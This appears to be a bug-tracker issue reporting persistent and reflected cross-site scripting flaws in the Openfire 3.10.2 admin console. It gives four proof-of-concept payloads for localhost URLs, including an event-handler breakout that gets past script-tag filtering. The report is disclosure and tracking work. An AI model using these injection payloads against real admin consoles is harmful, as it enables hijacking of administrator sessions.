Details

      Description

      hyp3rlinx has reported several Persistent & Reflected XSS issues in Openfire v3.10.2 admin console. A couple of these requires the Client Control plugin to be installed.

      Full details at: https://packetstormsecurity.com/files/133558/Openfire-3.10.2-Cross-Site-Scripting.html

      Vulnerability Details:

      1) Persistent XSS exists when creating an Group Chat Bookmark, XSS will execute each time victim accesses the 'Group Chat Bookmarks' web page vuln parameter 'groupchatName' XSS will be stored in 'ofbookmark' table in 'bookmarkName' column of the MySQL DB and will be under
      boomarkType as 'group_chat'.

      2) Persistent XSS exists when creating URL Bookmarks, vuln parameter 'urlName' XSS will be stored in 'ofbookmark' table in 'bookmarkName' column of the MySQL DB will be under column boomarkType as 'url'.

      3) Reflected XSS entry point exists in search parameter, script tags fail but we can defeat using onMouseMove() JS function.

      Exploit Code(s):

      1) Persistent XSS:
      http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=group_chat
      Inject the following payload into the 'Group Chat Name' field, then click 'Create'.

      <script>alert(666)</script>

      2) Persistent XSS:
      http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=url
      Inject the following payload into the 'URL Name' field, then click 'Create'.

      <script>alert('HELL')</script>

      3) Reflected XSS:

      http://localhost:9090/server-session-details.jsp?hostname="/><script>alert(666)</script>

      4) Reflected XSS:

      http://localhost:9090/group-summary.jsp?search="onMouseMove="alert('hyp3rlinx')

        Attachments

          Activity

            People

            Assignee:
            dwd Dave Cridland
            Reporter:
            timd Tim Durden
            Votes:
            1 Vote for this issue
            Watchers:
            4 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved: